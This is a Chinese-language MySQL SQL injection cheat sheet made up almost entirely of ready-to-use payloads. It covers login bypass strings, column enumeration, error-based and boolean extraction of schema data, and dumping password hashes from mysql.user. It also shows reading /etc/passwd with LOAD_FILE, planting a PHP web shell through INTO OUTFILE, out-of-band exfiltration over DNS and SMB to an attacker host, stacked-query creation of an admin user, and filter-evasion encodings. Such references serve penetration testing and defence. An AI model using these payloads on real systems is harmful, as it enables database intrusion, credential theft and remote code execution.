数据库的一些注入技巧-mysql

admin

默认数据库

Mysql	需要root权限
information_schema	版本5及更高版本可用

尝试注入

False表示查询无效（mysql语句错误/网页内容为空/与原页面不一致）

True表示查询有效（网页内容与原先一致）

字符串型

漏洞语句：

select * from table where id = ‘1’;

'	False
''	True
"	False
""	True
\	False
\\	True

例子：

SELECT * FROMArticles WHERE id = '1''';

SELECT 1 FROM dualWHERE 1 = '1'''''''''''''UNION SELECT '2';

数字型

漏洞语句：

SELECT * FROM Table WHERE id = 1;

AND 1  True

AND 0  False

AND true   True

AND false  False

1-false    如果有漏洞则返回1

1-true如果有漏洞则返回0

1*56   如果有漏洞则返回56

1*56        如果没漏洞则返回1

例子：

SELECT * FROM UsersWHERE id = 3-2;

笔记:

true 等同于 1.

false等同于 0.

登录口

漏洞语句：

SELECT * FROM Table WHERE username = '';

' OR '1

' OR 1 -- -

" OR "" = "

" OR 1 = 1 -- -

'='

'LIKE'

'=0--+

例子：

SELECT * FROM Users WHERE username = 'Mike' AND password = '' OR '' = '';

注释查询

以下内容可用于注释掉后面的其他语句

#

/*

-- -

;%00

`

例子：

SELECT * FROM Users WHERE username = '' OR 1=1 -- -' AND password ='';

SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3`';

获取版本

VERSION()

@@VERSION

@@GLOBAL.VERSION

例子:

SELECT * FROM Users WHERE id = '1' ANDMID(VERSION(),1,1) = '5';

内联注释

例子：

漏洞语句：

SELECT * FROM Users limit 1,{INJECTION POINT};

/*!50094eaea*/;	False – 数据库版本大于等于 5.00.94
/*!50096eaea*/;	True -   数据库版本小于5.00.96
/*!50095eaea*/;	False -  数据库版本等于5.00.95

数据库凭证

Table	mysql.user
Columns	user, password
Current  User	user(), current_user(), current_user, system_user(),  session_user()

例子：

SELECT current_user;

SELECT CONCAT_WS(0x3A, user, password)FROM mysql.user WHERE user = 'root'-- (Privileged)

密码可以解密

数据库名称

Tables	information_schema.schemata, mysql.db
Columns	schema_name, db
Current  DB	database(), schema()

例子：

SELECT database();

SELECT schema_name FROM information_schema.schemata;

SELECT DISTINCT(db) FROM mysql.db;-- (Privileged)

数据库主机名

例子：

SELECT @@hostname;

获取表和列确定列数通过group/order

GROUP/ORDER BY n+1;

笔记：

不断增加数字，直到页面错误

例子：

漏洞语句：

SELECTusername, password, permission FROM Users WHERE id = '{INJECTION POINT}';

1' ORDER BY 1--+  True

1' ORDER BY 2--+  True

1' ORDER BY 3--+  True

1' ORDER BY 4--+  False

-1' UNION SELECT 1,2,3--+   True 说明存在三列

通过报错（一）

GROUP/ORDER BY 1,2,3,4,5...

例子：

漏洞语句：

SELECTusername, password, permission FROM Users WHERE id = '{INJECTION POINT}'

1' GROUP BY 1,2,3,4,5--+	Unknown column  '4' in 'group statement'
1'  ORDER BY 1,2,3,4,5--+	Unknown column  '4' in 'order clause'

通过报错（二）

SELECT ... INTO var_list, var_list1, var_list2...

例子1：

漏洞语句：

SELECTpermission FROM Users WHERE id = {INJECTION POINT};

-1 UNION SELECT 1 INTO @,@,@	The used SELECT  statements have a different number of columns
-1  UNION SELECT 1 INTO @,@	The used SELECT  statements have a different number of columns
-1  UNION SELECT 1 INTO @	No error means  query uses 1 column

例子 2:

漏洞语句：

SELECT username,permission FROM Users limit 1,{INJECTION POINT};

1 INTO @,@,@	The used SELECT  statements have a different number of columns
1  INTO @,@	No error means  query uses 2 columns

通过报错（三）

AND (SELECT * FROM SOME_EXISTING_TABLE) = 1

例子：

漏洞语句：

SELECT permission FROMUsers WHERE id = {INJECTION POINT};

1 AND (SELECT * FROM Users) = 1

Operand should  contain 3 column(s)

检索表内容联合查询

UNION SELECTGROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10;

布尔查询

AND SELECT SUBSTR(table_name,1,1)  FROM information_schema.tables > 'A'

报错查询

AND(SELECT COUNT(*) FROM (SELECT  1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM  information_schema.tables LIMIT 1),FLOOR(RAND(0)*2)))

(@:=1)||@  GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT  1),!@) HAVING @||MIN(@:=0);

AND  ExtractValue(1, CONCAT(0x5c, (SELECT table_name FROM  information_schema.tables LIMIT 1)));-- Available in 5.1.5

检索列内容联合查询

UNION SELECT GROUP_CONCAT(column_name) FROMinformation_schema.columns WHERE table_name = 'tablename'

布尔查询

AND SELECT  SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'

报错查询

AND(SELECT COUNT(*)  FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT  column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2)))

(@:=1)||@ GROUP BY  CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),!@)  HAVING @||MIN(@:=0);

AND ExtractValue(1,  CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT  1)));-- Available in MySQL 5.1.5

AND (1,2,3) =  (SELECT * FROM SOME_EXISTING_TABLE UNION SELECT 1,2,3 LIMIT 1)-- Fixed in  MySQL 5.1

AND (SELECT * FROM  (SELECT * FROM SOME_EXISTING_TABLE JOIN SOME_EXISTING_TABLE b) a)

AND (SELECT * FROM  (SELECT * FROM SOME_EXISTING_TABLE JOIN SOME_EXISTING_TABLE b USING  (SOME_EXISTING_COLUMN)) a)

limit注入

漏洞语句：

SELECT username, permission FROM Users WHEREid = 1;

1 PROCEDURE ANALYSE()	Get the first  column's name
1  LIMIT 1,1 PROCEDURE ANALYSE()	Get the second  column's name
1  LIMIT 2,1 PROCEDURE ANALYSE()	Get the third  column's name

一次检索多个表/列

o    SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM(information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,'[ ',table_schema,' ] >',table_name,' > ',column_name))))x

SELECT * FROM Users WHERE id = '-1' UNION SELECT1, 2, (SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@)FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN(@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' >',column_name))))x), 4--+';

输出为

[ information_schema ] >CHARACTER_SETS >CHARACTER_SET_NAME

[ information_schema ] >CHARACTER_SETS >DEFAULT_COLLATE_NAME

[ information_schema ] >CHARACTER_SETS >DESCRIPTION

[ information_schema ] >CHARACTER_SETS >MAXLEN

[ information_schema ] >COLLATIONS >COLLATION_NAME

[ information_schema ] >COLLATIONS >CHARACTER_SET_NAME

[ information_schema ] >COLLATIONS > ID

[ information_schema ] >COLLATIONS >IS_DEFAULT

[ information_schema ] >COLLATIONS >IS_COMPILED

                                             

SELECT MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, table_name,0x3c62723e, 0x436f6c756d6e3a20, column_name ORDER BY (SELECT version FROMinformation_schema.tables) SEPARATOR 0x3c62723e),1,1024) FROMinformation_schema.columns

SELECT username FROM Users WHERE id = '-1' UNIONSELECT MID(GROUP_CONCAT(0x3c62723e,0x5461626c653a20, table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name ORDERBY (SELECT version FROM information_schema.tables) SEPARATOR0x3c62723e),1,1024) FROM information_schema.columns--+';

输出为

Table: talk_revisions

Column: revid

Table: talk_revisions

Column: userid

Table: talk_revisions

Column: user

Table: talk_projects

Column: priority

从系统列查询信息

SELECT table_name FROM information_schema.columnsWHERE column_name = 'username';

SELECT table_name FROM information_schema.columnsWHERE column_name LIKE '%user%';

SELECT column_name FROMinformation_schema.columns WHERE table_name = 'Users';

SELECT column_name FROMinformation_schema.columns WHERE table_name LIKE '%user%';

不使用单引号

SELECT * FROM Users WHERE username = 0x61646D696E

SELECT * FROM Users WHERE username = CHAR(97,100, 109, 105, 110)

字符串连接

SELECT 'a' 'd' 'mi' 'n';

SELECT CONCAT('a', 'd', 'm', 'i', 'n');

SELECT GROUP_CONCAT('a', 'd', 'm', 'i', 'n');

SELECT CONCAT_WS('', 'a', 'd', 'm', 'i', 'n');

条件语句

CASE

IF()

IFNULL()

NULLIF()

SELECT IF(1=1, true, false);

SELECT CASE WHEN 1=1 THEN true ELSE false END;

时间判断

SLEEP()	MySQL 5
BENCHMARK()	MySQL 4/5

' - (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1('true')), false)) - '

权限判断

确定哪个用户具有file权限

ELECT file_priv FROM mysql.user  WHERE user = 'username';	Root privileges  required	MySQL 4/5
SELECT  grantee, is_grantable FROM information_schema.user_privileges WHERE  privilege_type = 'file' AND grantee like '%username%';	No privileges  required	MySQL 5

文件读取

具有file权限的用户可以读取文件

LOAD_FILE()

SELECT LOAD_FILE('/etc/passwd');

SELECT LOAD_FILE(0x2F6574632F706173737764);

写文件

具有file权限的用户可以写文件

INTOOUTFILE/DUMPFILE

SELECT '<? system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php';

http://localhost/shell.php?c=cat%20/etc/passwd

SELECT '<? fwrite(fopen($_GET[f], \'w\'),file_get_contents($_GET)); ?>' INTO OUTFILE '/var/www/get.php'

http://localhost/get.php?f=shell.php&u=http://localhost/c99.txt

数据带外DNS

SELECT LOAD_FILE(CONCAT('\\\\foo.',(selectMID(version(),1,1)),'.attacker.com\\'));

SMB

' OR 1=1 INTO OUTFILE'\\\\attacker\\SMBshare\\output.txt

多语句执行

SELECT * FROM Users WHERE ID=1 AND 1=0; INSERT INTOUsers(username, password, priv) VALUES ('BobbyTables', 'kl20da$$','admin');

SELECT * FROM Users WHERE ID=1 AND 1=0; SHOW COLUMNS FROMUsers;

内联查询

MySQL允许在感叹号后指定版本号。仅当版本大于或等于指定的版本号时，才执行注释中的语法。

UNION SELECT /*!50000 5,null;%00*//*!40000 4,null-- ,*//*!30000 3,null--x*/0,null--+

SELECT 1/*!41320UNION/*!/*!/*!00000SELECT/*!/*!USER/*!(/*!/*!/*!*/);

混淆以下字符可以代替空格

09

0A

0B

0C

0D

A0

20

'%0A%09UNION%0CSELECT%A0NULL%20%23

括号也可以用来避免使用空格

UNION(SELECT(column)FROM(table))

and/or之后可以使用的符号

20	Space
2B	+
2D	-
7E	~
21	!
40	@

SELECT 1 FROM dual WHERE 1=1 AND-+-+-+-+~~((1))

利用注释+换行

1'#
AND 0--
UNION# Iam a comment!
SELECT@tmp--
`information_schema`.tables LIMIT 1#

1'%23%0AAND 0--%0AUNION%23I am a comment!%0ASELECT@tmp:=table_name x FROM--%0A`information_schema`.tablesLIMIT 1%23

VERSION/**/%A0 (/*comment*/)

URL  Encoding	SELECT %74able_%6eame FROM information_schema.tables;
Double  URL Encoding	SELECT %2574able_%256eame FROM information_schema.tables;
Unicode  Encoding	SELECT %u0074able_%u6eame FROM information_schema.tables;
Invalid  Hex Encoding (ASP)	SELECT %tab%le_%na%me FROM information_schema.tables;

逃避某些关键字

空格	information_schema . tables
反引号	`information_schema`.`tables`
注释	/*!information_schema.tables*/
其他	information_schema.partitions information_schema.statistics information_schema.key_column_usage information_schema.table_constraints

条件比较

AND , &&

=

:=

BETWEEN ... AND ...

BINARY

&

~

|

^

CASE

DIV

/

<=>

=

>=

>

IS NOT NULL

IS NOT

IS NULL

IS

<<

<=

<

LIKE

-

% or MOD

NOT BETWEEN ... AND ...

!= , <>

NOT LIKE

NOT REGEXP

NOT , !

|| , OR

+

REGEXP

>>

RLIKE

SOUNDS LIKE

*

-

XOR